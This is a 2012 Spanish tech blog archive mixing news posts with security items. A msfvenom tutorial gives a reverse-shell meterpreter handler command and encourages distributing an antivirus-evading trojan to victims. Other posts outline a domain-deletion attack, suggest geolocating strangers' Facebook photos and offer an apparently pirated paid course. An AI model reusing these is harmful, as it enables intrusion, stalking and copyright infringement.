jueves, 30 de agosto de 2012

Google gira 360 grados con Do a barrel roll y Z or R twice

Tipeando "Do a barrel roll" o "Z or R twice", Google gira 160 grados. 
Tipeando "Do a barrel roll" o "Z or R twice", Google gira 160 grados.
Esta vez no fue un doodle lo que impactó. El misterio se apoderó con un truco de Google: "Do a barrel roll". Todos se preguntaron porqué al poner esa frase en el buscador la pantalla se vuelve loca y pega un giro completo.

Al teclear esas palabras ("Haz una vuelta de barril", en inglés) y generar la búsqueda, la pantalla gira totalmente y deja con la boca abierta a los internautas.

Los usuarios de todo el mundo experimentaron y su pantalla giró en 360 grados. Este invento funciona en los navegadores Firefox, Chrome y Safari, no así en Explorer de Microsoft.

La frase que gira la pantalla es usada para hacer referencia a la necesidad de cambiar radicalmente algo que se está haciendo. Fue popularizada a raíz del videojuego Star Fox, para Nintendo 64. El personaje principal ocupaba la expresión cada vez que eludía obstáculos en su nave, quedando en la memoria de los entonces jóvenes jugadores, los mismos que hoy les hace sentido el truco de Google.

Sin embargo, el truco también está disponible al teclear "Z or R twice" en el espacio de búsqueda.




Crea un código QR a color, con foto o logo, en QR Hacker

Suficiente de códigos QR en blanco y negro? Bueno, QR Hacker es la alternativa ideal para darle vida y color a un código QR. No siendo suficiente con ello, con QR Hacker incluso se puede agregar una foto o logo en el código QR, sin temor a que sea inválido o ilegible para los lectores de códigos QR.
En QR Hacker podemos fácilmente crear el código QR de un texto, URL, número de teléfono o VCard. Seleccionamos la opción deseada y luego clic en "Generate". En la sección derecha podemos personalizar el código QR y darle un color, agregar una foto de fondo (o color) y agregar un logo.
Finalmente se puede guardar el código QR como imagen o PDF.
Importante: Cada personalización va llenando la barra inferior mostrada en la imagen. Un llenado completo de la barra significa que el código QR está demasiado personalizado y puede volverse ilegible para los dispositivos lectores. Es necesario que esta barra no se llene para obtener un código QR válido o legible.
Código QR a color, con foto y logo | QR Hacker

Luna azul: 31 de agosto del 2012


Actualmente se denomina luna azul (traducción del inglés blue moon) a la segunda luna llena ocurrida durante un mismo mes del calendario gregoriano (el usado habitualmente en occidente), lo que sucede aproximadamente cada cuatro años. Originalmente el término se refería al cuarto plenilunio de una estación cualquiera del año. El fenómeno luna azul cobró popularidad cuando se produjo dos veces en el mismo año (enero y marzo) de 1999. Los medios de comunicación reseñaron ampliamente el acontecimiento, poco conocido hasta entonces. El mes de febrero de ese año no se produjo ninguna luna llena.

Los meses del calendario gregoriano generalizado sobre el origen del término, probablemente en la Europa medieval, y la difusión de su uso. La traducción castellana tal vez sea errónea porque en inglés antiguo la palabra de la cual deriva blue podía significar tanto azul como traidor.[1]

Entre tres y siete veces en cada siglo hay dos lunas azules en un mismo año. Debido a que el mes de febrero es el único cuya duración es inferior al ciclo lunar, la primera siempre se produce en enero y la segunda, en orden decreciente de probabilidad, en marzo, abril o mayo.[2] Se observó una el día 31 de diciembre de 2009, coincidiendo con un eclipse parcial de luna, cuyo plenilunio previo fue el día 2 de diciembre. Las siguientes lunas azules se producirán en agosto de 2012, julio de 2015, enero y marzo de 2018, octubre de 2020, agosto de 2023, mayo de 2026, diciembre de 2028...

Lunas Azules entre 1994 y 2094:

LUNAS AZULES

JUL 96 ENE 99 MAR 99 NOV 01 JUL 04 JUN 07 DIC 09 AGO 12 JUL 15 ENE 18 MAR 18 OCT 20 AGO 23 MAY 26 DIC 28 SET 31 JUL 34 ENE 37 MAR 37 OCT 39 AGO 42 MAY 45 ENE 48 SET 50 JUL 53 MAR 56 OCT 58 AGO 61 MAY 64 DIC 66 SET 69 MAY 72 ABR 75 OCT 77 JUL 80 MAY 83 DIC 85 SET 88 JUL 91 ENE 94 ABR 94

Actualmente el 31 de agosto del 2012 ocurrirá la luna azul.

Fuente: es.wikipedia.org

¿Perseguir a los hackers o reclutarlos?

La Analista del IEEE Mª José Caro Bejarano analiza en un breve documento un dilema que muchos gobiernos llevan tiempo planteando: perseguir a los hackers o reclutarlos para sus programas de ciberseguridad.

Sirva de avance algunos fragmentos del documento informativo:

"Durante el mes de junio, los funcionarios del gobierno surcoreano habían entrevistado a 238 piratas jóvenes altamente cualificados, todos ellos estudiantes de secundaria y posgrado, y habían seleccionado a 60, aunque solo seis llegarán a la fase final.

Los elegidos recibirán una beca de casi 14.000 euros, además de la oportunidad de estudiar en el extranjero y formar parte de la base de datos de recursos humanos de la Agencia Nacional de Inteligencia y la Policía de Corea del Sur."

"Según Arquilla, el gobierno de EEUU, en lugar de perseguir a los piratas informáticos de élite, debería reclutarlos para lanzar ataques cibernéticos contra los terroristas islamistas y otros enemigos.


Este destacado pensador militar y asesor del gobierno, opina que EEUU se ha quedado atrás en la carrera de cibernética y necesita establecer un "nuevo Bletchley Park" de genios informáticos y crackeadores de código para detectar, rastrear y desbaratar las redes enemigas."

Sin duda una interesante lectura que os recomendamos: pdf

miércoles, 29 de agosto de 2012

Msfvenom: la cosa va de payloads y encoders

Esta herramienta que pertenece al framework de Metasploit, no dispone de una larga vida… allá por 2011 es cuando explota y muestra su potencial y flexibilidad. Más bien, su flexibilidad, ya que el potencial ya es conocido, ¿Por qué es conocido? Realmente msfvenom es la unión de msfpayload y msfencode. Como recordatorio decir que msfpayload se encarga de generar payloads para distintas plataformas, mientras que msfencode se encarga de codificar dichos payloads con el objetivo de evadir la detección mediante el uso de antivirus.
Hay que comentar que la riqueza semántica que aporta msfvenom es digna de mencionar. Normalmente, este tipo de aplicaciones, como son las predecesoras msfpayload y msfencode, proporcionan parámetros del estilo -<letra>, lo cual no aporta mucha información al auditor, atacante, usuario casero o quien quiera que lo esté usando… Con msfvenom se dispone de parámetros semánticos, lo cual hace que la aplicación sea realmente intuitiva y sencilla de utilizar.


Beneficios de msfvenom
Los beneficios de msfvenom se enumeran a continuación:
  • Se simplifica la generación de payloads y los intentos de codificación de éstos.
  • Se presenta como una herramienta estándar que ayuda a los auditores y a cualquier usuario su manejo. Es realmente intuitiva y con fácil aprendizaje.
  • El rendimiento ha sido mejorado considerablemente. La velocidad con la que msfvenom trabaja es claramente más alta que el uso de msfpayload y msfencode por separado. Esto es bastante lógico debido a que se evita el paso de información entre distintos procesos, y toda acción es realizada por el mismo proceso.
Opciones de msfvenom

Algunas de las opciones más útiles de msfvenom se enumeran a continuación:
  • Payload. Este parámetro especifica el payload que se utilizará.
  • Encoder. Este parámetro especifica el algoritmo que se utilizará para realizar la codificación.
  • Format. Especifica el formato, normalmente EXE :D
  • Bad-chars. Este parámetro indica un listado de bytes que no se deben generar en el proceso de obtención del payload. Por ejemplo, si se quieren evitar los bytes nulos ‘\x00′ se añaden en la lista de este parámetro.
  • Iterations. Indica el número de iteraciones que se ejecutará el algoritmo del encoder.
  • Template. Indica la plantilla de ejecutable que se utilizará.
  • Keep. Especifica que el payload se ejecutará en un thread y no en el main del ejecutable. Con esta opción se implementa la técnica de plantilla personalizada sigilosa.
Ejemplo o prueba de concepto: msfvenom y el ejecutable meterpreter

En este breve ejemplo se utilizará msfvenom para crear un ejecutable para sistemas windows con el que, cuando la víctima ejecute el archivo devolverá el control de la máquina al atacante. En primer lugar el atacante utiliza msfcli para lanzar el manejador, configurado para recibir sesiones inversas de meterpreter. La orden sería la siguiente msfcli exploit/multi/handler lhost=<ip atacante> lport=<puerto atacante> payload=windows/meterpreter/reverse_tcp.
Ahora, creamos el ejecutable de la siguiente manera:


Una vez que el archivo es creado se debe distribuir, aquí ya… ya sabéis: “El límite es tu imaginación“. Ahora, una vez que la víctima ejecute el archivo recibiremos la sesión inversa, teniendo una sesión de meterpreter, con todo lo que ello conlleva! que no es poco… :D
Análisis de virus total
Por último, hablaremos de un análisis sobre el ejecutable que hemos creado. Hay que tener en cuenta que en la prueba de concepto hemos utilizado una plantilla, que es el ejecutable de RootkitRevealer, para inyectarle un payload. ¿Cuantos antivirus salvaremos? En la siguiente imagen se puede visualizar los resultados.


Metasploit da mucho juego, y el framework aporta una riqueza y flexibilidad a los pentesters inigualable. En Flu Project creemos que a finales de año y principios del proximo será el año Metasploit! Esperemos que así sea… :D 


Pull the Plug: Bureaucratic Denial Of Service (1 de 4)

Para la ya pasada Defcon20, mi amigo Luis Delgado (@ldelgadoj) me pidió que le ayudara a enviar y dar una charla allí, ya que había descubierto varios 0days en OVH y quería presentarlos. Nos reunimos y hablamos de ello, y luego estuvimos trabajando un par de días más en Las Vegas para dejar la charla que dimos en SkyTalks. Esta sección de conferencias es una sección privada en la que se puede presentar casi cualquier cosa, porque no se graban. Hoy en día, ya solucionados los bugs en OVH, vamos a contaros la sesión que construimos.
Pull the Plug: Bureaucratic Denial Of Service
El servidor DNS de una compañía quizá es uno de los más importantes, si no el que más grado de impacto tiene en el funcionamiento de una empresa. Esto es debido a que la mayoría de los servicios de negocio, comenzando desde la visibilidad web de la organización, están enlazados a él. Servicios de correo electrónico, páginas o web, e incluso la publicación de los RSS de los blogs dependen de un punto accesible a través del servicios DNS. Si una empresa se queda sin DNS, entonces todo se pierde.
Figura 1: Secuestro de dominio a TheRegister.co.uk
Los ataques DNS han sido siempre los que más han preocupado a la infraestructura de Internet, por lo que ataques como el Dan Kaminsky, o los fallos explotables en DNS o registradores de Internet siempre tienen un impacto especial. Dentro de estos "ataques", hay que destacar los ataques judiciales que se realizan mediante el sistema legal. Cada Top Level Domain tiene un sometimiento legal a las leyes de un determinado país, llegando a suceder que si un país quiere desconectar a una organización de Internet, puede hacerlo a través del nombre de dominio.
Figura 2: Supresión del dominio Rojadirecta.com por el gobierno americano
Estos casos fueron de especial relevancia, a nivel mundial con Wikileaks.org, y en el caso de España tuvo mucha relevancia Rojadirecta.com, que al ser un dominio .com está sometido a la legislación americana. Como un intento de evitar la censura de los canales de comunicación RSS fue por lo que se creo el sistema DUST, de publicación de feeds RSS mediante redes P2P y uso de PGP.
Figura 3: Anuncio de supresión de Wikileaks,org por Twitter y DUST

Registradores de dominios internacionales
Dejando a los gobiernos y los TLDs atrás, hay una organización en medio, que casi todas las compañías tienen, que son los registradores, que pueden ser nacionales, o simples empresas intermediarias que ofrecen servicios de Internet, como el registro DNS, el hosting web, etcétera. Empresas de este tipo son 1and1, GoDaddy, OVH, etcétera. La seguridad de los sistemas que implementen dichas compañías impacta directamente en la existencia o no de sus clientes en Internet. Es por ello que deben tener sistemas informáticos y procedimientos de gestión seguros a la hora de manejar los nombres de dominio de sus clientes.

Figura 4: OVH es una gran empresa en este campo
El objetivo de este artículo es mostrar que tanto los fallos en las aplicaciones web que permiten a los usuarios gestionar sus servicios, como los fallos en la lógica de las operaciones, pueden llevar a que un cliente pierda su dominio y sea desconectado de Internet.
Ataques a los nombres de dominios
Dentro de los ataques más importantes que se pueden hacer se encontraría, como no, el secuestro del dominio, y el "pull the plug" o borrado del dominio de Internet, lo que supondría una Denegación de Servicio bastante engorrosa de solucionar en un corto espacio de tiempo. Las fases para realizar estos ataques serían las siguientes:
Fase 1: Recogida de información: El objetivo es aprovechar cualquier data leak o bug en el sistema informático de la compañía para poder sacar datos del dominio víctima. Por supuesto, la segunda fase sería aprovechar OSINT (Open Source Intelligence), es decir, las fuentes de información abiertas, como servicios Whois, metadatos, buscadores de Internet o redes sociales. 
Fase 2: Petición de borrado del dominio: Una vez conseguida toda la información necesaria, intentar suplantar al dueño legítimo del mismo. Esto deberá realizarse de dos formas, una de ellas informática mediante la creación de una petición falsa de borrada del dominio con suplantación del dueño, y una segunda, en la que se salten los sistemas de validación del registrador, en la fase 3. 
Fase 3: Cumplimentación del proceso: En esta fase hay que conseguir cumplir con todos los requerimientos del proceso, y evadir cualquier control que tenga implementada la compañía, para identificar de forma robusta al dueño del dominio.
- Pull the Plug: Bureaucratic Denial Of Service (1 de 4)
- Pull the Plug: Bureaucratic Denial Of Service (2 de 4)
- Pull the Plug: Bureaucratic Denial Of Service (3 de 4)
- Pull the Plug: Bureaucratic Denial Of Service (4 de 4)

Fuente

lunes, 27 de agosto de 2012

All the input is evil - II de III

Hoy, en uno de esos intentos por escribir algo que no solo tenga que ver con fallos de seguridad informática me decidí a escribir un post básico sobre las vulnerabilidades más comunes en aplicaciones web y como sanitizarlas.










 





Segunda parte de esta entrega, esta vez poniendo solución a fallos relacionados con la inclusión de archivos ejecutables

1. - Inyecciones LFI & RFI (Local/Remote File Include).

Veamos el típico ejemplo de inclusión de archivos de forma dinámica convirtiendose en métodos inseguros.















En ochenta mil sitios van a decir que este código es vulnerable y hay que sanitizar la variable $file, yo digo que no. Lo que no hay es que realizar includes dinámicos directamente para no comprometer el servidor.

Sí, se podría sanitizar pero, ¿hasta que punto lo convertiríamos en un LFI? ¿Realmente es posible?
Claro que es posible filtrar los datos de entrada, pero es que no es necesario porque el mismo código se podría estructurar de otra forma más segura. Veamos:

























Así y con un poco de código extra se pueden guardar los logs de los "hackers" que lo intentaron por esa vía y bloquear sus ips o hacer lo que se crea necesario.


2. - Inyecciones tipo SSI a partir de XSS (Server Side Includes).

Lo más típico, descubrir un fallo tipo XSS en un servidor Apache y probar si SSI está activado. Es sorprendente la cantidad de servidores que lo tienen activado y no lo usan, simplemente porque no saben que está ahí.

Llegados a este punto es fácil saber que de no existir el XSS  (All the input is evil - I de III) esto nunca llegaría a funcionar.

Así que para que repetir lo que ya sabemos, cuidado con las inyecciones tipo Cross Site Scripting porque son más de lo que parecen (nunca dijimos lo contrario).

Un poco de información sobre SSI };)



All the input is evil - III de III




sábado, 25 de agosto de 2012

Murió Neil Armstrong, el primer hombre que pisó la Luna

El primer hombre en pisar la luna, el estadounidense Neil Armstrong, murió el sábado a los 82 años en Ohio (EEUU), días después de superar una operación de corazón, según informan las cadenas de televisión norteamericanas NBC y ABC.

Comenta esta lamentable noticia en nuestros Foros.
La agencia Efe informó que Armstrong, que en julio de 1969 hizo historia en la misión del Apolo 11 junto a los astronautas Buzz Aldrin y Michael Collins, se sometió a principios de mes a una operación, aunque por el momento se desconoce la causa inmediata de su fallecimiento.
Armstrong comandó la nave espacial Apollo 11 que aterrizó

El astronauta estadounidense Neil Armstrong, el primer hombre en pisar la Luna el 20 de julio de 1969, falleció a los 82 años. (Siga este enlace para ver una galería de fotos sobre Neil Armstrong).

Armstrong, que en julio de 1969 hizo historia en la misión del Apolo 11 junto a los astronautas Buzz Aldrin y Michael Collins, se sometió a principios de mes a una operación. (Lea también: La importancia de Neil Armstrong y el Apolo 11 para la humanidad)

Recordándole como un "reacio héroe estadounidense", su familia explicó en un comunicado que "sirvió a su nación con orgullo, como piloto de guerra de la Marina, piloto de pruebas y astronauta".

Armstrong, quien hizo historia en la misión del Apolo 11 junto a los astronautas Buzz Aldrin y Michael Collins, se sometió a principios de mes a una operación por problemas cardiovasculares, cuyas "complicaciones" llevaron a su muerte, según el comunicado. (Lea también: La historia detrás de Neil Armstrong).
Su familia se mostró "devastada" al informar de la muerte del hombre que hizo famosa la frase "un pequeño paso para el hombre, un gran paso para la humanidad", y que era además "un cariñoso marido y padre".
"Era un héroe estadounidense a regañadientes porque siempre creyó que sólo estaba haciendo su trabajo", señaló el comunicado citado por la cadena CNN, en el que la familia subraya su pasión por la aviación y la exploración espacial.
Antes de hacer historia al pisar la luna hace 43 años, Armstrong fue un ingeniero y piloto de pruebas de la Fuerza Aérea estadounidense, y después pasó al Comité Nacional de Asesores para la Aeronáutica, la agencia predecesora de la NASA. (Lea: Los primeros pasos lunares de Armstrong, un revés para la URSS).

La misión del Apolo 11 fue su última incursión en el espacio, y su único papel de relevancia pública desde entonces fue el de vicepresidente de la investigación del desastre del transbordador Challenger, en 1982. Su última comparecencia pública fue en noviembre de 2011 cuando recibió la medalla de Oro del Congreso de Estados Unidos junto a sus compañeros de la misión a la luna, Aldrin y Collins.

'Era un héroe': Obama

El presidente de Estados Unidos, Barack Obama, afirmó estar "profundamente triste" al tiempo que alabó al astronauta Neil Armstrong, primer hombre en pisar la Luna el 20 de julio de 1969 y fallecido este sábado a los 82 años, un gran héroe nacional que inspiró a toda una generación.

"Neil era uno de los grandes héroes estadounidenses, no sólo de su tiempo, sino de todos los tiempos. Cuando él y su compañero de misión despegaron a bordo del Apollo 11 en 1969 llevaron las aspiraciones de una nación entera", afirmó el presidente en un comunicado.



Fuente

[ANÁLISIS FORENSE] Extracción Metadatos GPS de Fotografias



En esta entrada, mostraré cómo extraer los Metadatos de las Fotografías para saber el lugar exacto de ubicación donde se tomo la Fotografía.
Hay que tener en cuenta que no todas las Fotografías tienen datos GPS. La mayoría de las fotos que existen con estos datos, son tomadas desde teléfonos inteligentes y/o cámaras de ultima generación. 
Sin embargo, muchas personas que cuentan con estos teléfonos, no tienen conocimiento sobre la opción GPS, por lo que simplemente no saben que esta encendido al momento de tomar una Fotografía.
También resaltar que este método es utilizado para resolver muchos "crímenes" porque realizando un Análisis Forense de una Fotografía, se puede obtener los datos REALES y EXACTOS del momento, fecha, hora, ubicación, nombre de la cámara, fecha de edición si la imagen ha sido editada y todas las demás opciones puestas en ella, llegando así a obtener un resultado real.
¿Qué son los metadatos?
Metadatos en pocas palabras es decir, los datos acerca de los datos, por ejemplo cuando se toma una fotografía, se obtiene una gran cantidad de datos, como qué tipo de cámara tome la foto, la hora y fecha en que fue tomada etc...
Ahora bien, para realizar este método, usaremos la herramienta EXIFTOOL que esta disponible tanto para Linux como para Windows.
En BackTrack podemos encontrarla en la siguiente dirección:

Aplicaciones - BackTrack - Forensics - Forensics Analysis Tools - Exiftool.
Si aun no la tenes, podes descargarla desde el siguiente link: Download Exiftool Linux - Windows
Descomprimen el archivo Exiftool en una carpeta preferida, abren la terminal y vamos a la carpeta exiftool.

INSTALACIÓN:

  • perl Makefile.PL
  • make
  • make test
  • make install
  • ./exiftool


Teniendo todo listo, creamos una carpeta donde ira la imagen que deseamos extraer los metadatos, en este caso yo he creado una carpeta en root con el nombre images, asegurese de conocer bien la ruta.
La imagen que voy a utilizar se llama fotografia.jpg la cual esta en la carpeta images.
La ruta seria: ~/images/fotografia.jpg
Ahora, en la terminal de exiftool tecleamos el siguiente comando:
./exiftool -a ~/images/fotografia.jpg
La cual nos arroja los siguientes datos:
Se puede observar muchos datos, como la fecha y hora que se tomo la imagen y todo lo demas que mencione lineas arriba, ademas de que la foto fue tomada desde un SAMSUNG.
En este caso, queremos saber la ubicacion de donde fue tomada la fotografia, por lo que copiaremos los datos GPS, la cual son los siguientes:
  • GPS Latitude: 42 deg 24' 54.91" N
  • GPS Longitude: 83 deg 25' 21.36" W
  • GPS Position : 42 deg 24' 54.91" N, 83 deg 25' 21.36" W

Entonces, nos dirigimos a http://www.maps.google.com e introducimos las coordenadas.
  • GPS Position : 42 deg 24' 54.91" N, 83 deg 25' 21.36" W

¿Por qué no funciona? Bueno, en primer lugar tenemos que tener algunas cosas claras, por ejemplo:
Las coordenadas son:
  • 42 deg 24' 54.91" N, 83 deg 25' 21.36" W

Entonces, tenemos que quitar todo el ' " , N W y poner - entre el medio de las coordenadas, por lo que quedaría así:
  • 42 24 54.91 - 83 25 21.36
Ahora, esas coordenadas las introducimos en Google Maps y nos dará la ubicación exacta.

Como podemos apreciar, esta Fotografía fue tomada en  Laurel Park Dr Livonia, MI 48152, EE.UU
Una cosa divertida de hacer esto es tomar fotos desde Facebook y utilizar este método para encontrar las Coordenadas GPS.
Que se diviertan!
Saludos.


Fuente

viernes, 24 de agosto de 2012

EC-Council - Certified Ethical Hacker v7: Videos - Herramientas - Tutoriales FREE!


Certified Ethical Hacker v7 proporciona un exhaustivo red de programas de Hacking Ético y Seguridad para cumplir con los estándares de los profesionales de seguridad altamente calificados. 
Cientos de SMEs y autores han contribuido al contenido que se presenta en el material pedagógico Certified Ethical Hacker v7
Las últimas herramientas y Exploits descubiertos de la comunidad Underground se ofrecen en este paquete
Estos DVD-ROM es solamente para investigación y propósitos educativos. El objetivo principal de estos DVD-ROM es proporcionar al usuario contenido para Investigación en Educación o el ser relevante para la seguridad de red y los distintos métodos de protección y sus defectos intrínsecos mediante la demostración de métodos de exploits y técnicas.
Esta información debe ser utilizada únicamente con fines docentes y de investigación.
El uso o la aplicación de algunos de los programas o contenidos en este DVD puede violar la Ley Federal. Por esta razón se instruye a no utilizar cualquiera de los programas o contenidos aquí dentro que pueda violar cualquier ley o atentan contra la protección de copyright de otros.


DESCRIPCIÓN:

EC-Council Certified Ethical Hacker v7 
English | ISO + PDF + VIDEOS | 19 Modules | 16.25 GB

TEMAS TRATADOS:

  • Introduction to Ethical Hacking.
  • Footprinting and Reconnaissance.
  • Scanning Networks.
  • Enumeration.
  • System Hacking.
  • Trojans and Backdoors. 
  • Viruses and Worms.
  • Sniffers.
  • Social Engineering.
  • Denial of Service.
  • Session Hijacking.
  • Hacking Webservers.
  • Hacking Web Applications.
  • SQL Injection.
  • Hacking Wireless Networks.
  • Evading IDS, Firewalls and Honeypots.
  • Buffer Overflows.
  • Cryptography.
  • Penetration Testing.





DESCARGAR:

El precio total sobre esta documentación es de $1,295.00 por lo tanto la descarga gratis esta muy escasa en Internet, ya que la mayoría de descargas se pueden realizar mediante un pago o una cuenta premium con dinero, pero en este caso se las estoy dejando totalmente FREE asi que por favor agradecer no cuesta nada :)
Certified Ethical Hacker (CEH v7) Overview:



Mas Información del Producto:

Espero les guste y disfruten !


Fuente

De invitado de red a adminitrador de dominio de Windows en 60 segundos

"Sus sistemas tenían instalados los últimos parches, su equipo de seguridad vigilando y los pentesters (aficionados) acababan de entregar su informe de "cumplimiento". Ellos pensaban que su dominio de Windows era seguro. Ellos pensaron mal."

 
 Zack Fasel presentó en la DefCon 20 un nuevo toolset escrito en Ruby y bautizado como ZackAttack con nuevos métodos para obtener solicitudes de autenticación integradas de Windows y realizar re-envíos NTLM tanto interna como externamente. ¿El objetivo? Empezar como un don nadie y obtener el administrador de dominio (o datos sensibles/accesos) en 60 segundos o menos en un entorno Windows con todos los parches y típicamente securizado. ¿El resultado? Zack demuestra la posibilidad de ganar acceso *externamente* a una cuenta de dominio Exchange simplemente mediante el envío de un correo electrónico con consejos para evitar estos ataques.

Con tan sólo un clic en un enlace, una vista de un correo electrónico o una mala petición web, este nuevo conjunto de herramientas roba la identidad de los usuarios objetivo y se aprovecha de su acceso. Llama a tus administradores de dominio, oculta tus road warriors y avisa a tus usuarios internos. Zack va a cambiar la forma de pensar acerca de la seguridad y las relaciones de confianza del Directorio Activo de Windows, que te conduciran a promover la fortificación de tus sistemas y ayudarte a dormir mejor por la noche.


 

Google Maps brinda estado del tránsito en tiempo real en Perú


google maps

A todos nos ha pasado que cuando salimos de casa con el tiempo justo para llegar a alguna reunión, trabajo o a nuestro centro de estudios, queremos conocer el estado del tránsito para evitar recorrer las avenidas más congestionadas por autos y demás vehículos de transporte público, y optar por aquellas en las que haya mayor fluidez.
Y si vives en Lima, de hecho que esa información te sería muy útil. Pues bien, si estás a punto de salir de casa para ir a tu trabajo, o en todo caso ya saliste de casa, te vendría bien echar un vistazo a Google Maps porque, a partir de ahora, la plataforma de mapas que brinda la compañía de la gran G muestra la información del tránsito en tiempo real en nuestro país, Perú.
El sistema es muy sencillo. Solo hace falta ir al sitio web de Google Maps, ubicarte en la región del mapa de la cual quieres conocer el estado del tránsito, y luego seleccionar la pestaña ‘Tránsito‘, que está en la parte superior derecha del mapa. Una vez hecho eso, verás el estado de congestionamiento de las avenidas de acuerdo con líneas de colores trazadas en el mapa. Por ejemplo, si ves una línea de color verde, quiere decir que el tránsito es rápido, mientras que todo lo contrario si la línea dibujada sobre el mapa es de color rojo.
¿Qué les parece? Personalmente, pienso que es una gran alternativa (aparte de sintonizar la radio) para enterarnos del tránsito en Perú y así salir de casa preparados para enfrentarnos a lo que pueda suceder en el camino, sobre en todo en una ciudad como Lima, que cada vez más parece más congestionada.
Pero además de Perú, la información en tiempo real del tránsito de Google Maps ha sido añadida recientemente a otros países, como México, Bielorrusia, Estonia, Letonia, Rumania y Sudáfrica.

Fuente: Google Maps

jueves, 23 de agosto de 2012

Un mensaje del fundador de Wikipedia, Jimmy Wales

Un mensaje del fundador de Wikipedia, Jimmy Wales Google puede tener cerca de un millón de servidores. Yahoo tiene alrededor de 12.000 empleados. Nosotros tenemos 679 servidores y un equipo de 138 personas. Wikipedia es el quinto sitio web en la red y es usado por 492 millones de personas diferentes cada mes, con miles de millones de vistas de páginas. Comerciar es bueno, la publicidad no es algo malo, pero no tiene lugar aquí. No en Wikipedia. Wikipedia es algo especial. Es como una biblioteca o un parque público. Es como un templo para el pensamiento. Un lugar al que todos podemos ir a pensar, a aprender, a compartir nuestros conocimientos con otros. Cuando fundé Wikipedia, pude haberla creado como una compañía lucrativa, con anuncios publicitarios, pero decidí hacer algo diferente. A lo largo de los años, hemos trabajado bastante para no gastar de más. Cumplimos nuestra misión, sin desperdiciar nuestros limitados recursos. Si todas las personas que leen este mensaje donaran S/.15, sólo tendríamos que recaudar fondos un día al año. Pero no todos pueden donar o están en disposición de hacerlo, y está bien que sea así. Cada año el número de personas que deciden donar es justo el necesario. Este año, por favor considera hacer una donación de S/.15, S/.30, S/.60 o la cantidad que puedas para proteger y mantener Wikipedia. Gracias, Jimmy Wales Fundador de Wikipedia

Si quieres donar dirigite a https://donate.wikimedia.org/wiki/Special:FundraiserLandingPage?uselang=es&country=PE&template=Lp-layout-default&appeal-template=Appeal-template-default&appeal=Appeal-default&infobox=Default&form-template=Form-template-default&form-countryspecific=Form-countryspecific-control&utm_medium=sitenotice&utm_source=B12_0815_JimmyControl_es_forall_PE&utm_campaign=C12_Fundraising_es_PE  es esta la página original del mensaje.

El futuro de las baterías


La Ley de Moore nos malacostumbró a esperar que la capacidad de un microprocesador se duplique cada 18 meses e incluso hemos visto que se aplica de forma similar a la capacidad de almacenamiento e incluso al ancho de banda. Cada vez tenemos productos electrónicos más rápidos, más pequeños y con más memoria. Sin embargo las baterías que utilizan estos productos están basadas en una tecnología con más de 20 años de antigüedad y sus mejoras han avanzado a un ritmo glacial. Pero hay signos esperanzadores que eso está pronto a cambiar.

Para empezar, el problema de las baterías tiene más de una arista. Primero tenemos el problema de la capacidad: Queremos baterías que sean capaces de almacenar más energía en el mismo espacio y ojalá en tamaños cada vez más pequeños, en otras palabras, queremos más vatios-hora por kilogramo (Wh/kg). También queremos que lleguen a su carga máxima en el menor tiempo posible. Luego queremos que las baterías sean cada vez más baratas para que, por ejemplo, los autos eléctricos o híbridos puedan costar lo mismo o menos que los autos a gasolina. Adicionalmente todas las baterías tienen una vida útil limitada ya que con cada ciclo de carga/descarga van perdiendo capacidad. Y finalmente tenemos los problemas térmicos donde las baterías se calientan con el uso, hasta incluso generar problemas de seguridad con baterías entrando en combustión. Lo que necesitamos hoy son baterías baratas, seguras, que se carguen a su capacidad máxima en pocos minutos, que aguanten miles de ciclos de carga y con una densidad que permita acumular mucha energía en el menor espacio posible.

La baterías de hoy

Las baterías más populares y avanzadas que encontramos hoy en nuestros artefactos son las baterías de Litio-Ion Polímero — algo que tiene muy contento a Argentina, Bolivia y Chile, ya que estos 3 países concentran en sus salares el 90% de las reservas mundiales de litio. Estas las podemos encontrar hoy en nuestros dispositivos electrónicos, autos eléctricos y hasta en el sistema de suministro eléctrico. Sin embargo las baterías de Li-Ion se empezaron a comercializar en 1991, por lo que llevamos usando prácticamente la misma tecnología hace más de dos décadas y sobre la cual todos podemos concordar que necesita una actualización de forma urgente.

Estas baterías que utilizamos hoy tienen una vida útil de 400 a 1200 ciclos de carga, y una capacidad de 100 a 250 Wh/kg. Finalmente tienen el problema de la velocidad de carga donde, por ejemplo, para un iPod en las primeras 2 horas cargas el 80% de capacidad y luego se demora 2 horas más en cargar el 20% restante.

Un problema acentuado especialmente cuando se aplica en automóviles eléctricos. El año pasado estuve manejando durante un par de semanas un Mitsubishi iMiEV y aunque la ruta que recorro diariamente no son más de 15 Kms, debía estar recargando su batería de Li-Ion cada 3 días. En el punto de recarga podía recargar el 50% de la capacidad en 15 minutos y luego debía pasar a un ciclo de carga mucho más lento que duraba hasta 8 horas ya que podía “degradar considerablemente” la capacidad de la batería, acortando rápidamente su vida útil, si continuaba con la carga rápida. Difícil va a ser convencer al mundo de cambiarse a autos eléctricos mientras las baterías carguen tan lento, sean tan caras y más encima deban ser reemplazadas a los pocos años.

Las baterías de mañana

Las desventajas de la tecnología actual están claras, así que empecemos a ver que esperanza hay en el futuro. Hay cuatro tecnologías que se ven promisorias: Litio-Ion Silicio, Litio-Ion 3D, Litio-aire y Zinc-aire.

Litio-Ion Silicio

Varios investigadores incluyendo el equipo del Dr. Yi Cui en la Universidad de Stanford han anunciado avances en reemplazar el ánodo en una batería de Li-Ion por uno cubierto en nanohilos de silicio en vez del grafito (carbono) utilizado hoy. El resultado son baterías de Li-Ion con una capacidad específica 10 veces superior a las baterías actuales. Tradicionalmente el problema de los ánodos de silicio era que durante la carga estos podían aumentar hasta 4 veces su tamaño, para luego volver a su dimensión original durante la descarga. Esto significa que después de pocos ciclos de carga el ánodo quedaba destruido resultando en una vida útil muy corta para la batería. Sin embargo los últimos avances en nanotubos de silicio de doble capa dan esperanza que finalmente este obstáculo haya sido superado con demostraciones de laboratorio sobre los 6.000 ciclos de carga, superando considerablemente la vida útil de las baterías actuales. Esto nos daría baterías con una capacidad 10 veces superior utilizando el mismo espacio, y una vida útil 6 a 12 veces superior a las actuales.

Litio-Ion 3D

La compañía Prieto Battery y su fundadora la Dra. Amy Prieto (sin relación), están trabajando en otra forma de reemplazar el ánodo de grafito en una batería Li-Ion con algo más eficiente. En su caso lo están reemplazado con ánodos de nanohilo de cobre. El resultado según ellos son baterías que funcionan en “3 dimensiones”, permitiendo un movimiento de los iones mucho más rápido, con uno de los beneficios siendo poder cargar al 100% la batería de un iPhone en 5 minutos con una fuente de electricidad de 240 volts. A esto hay que sumarle el beneficio de baterías más seguras y una vida útil teórica de más de 5.000 ciclos de carga.



Litio-Aire

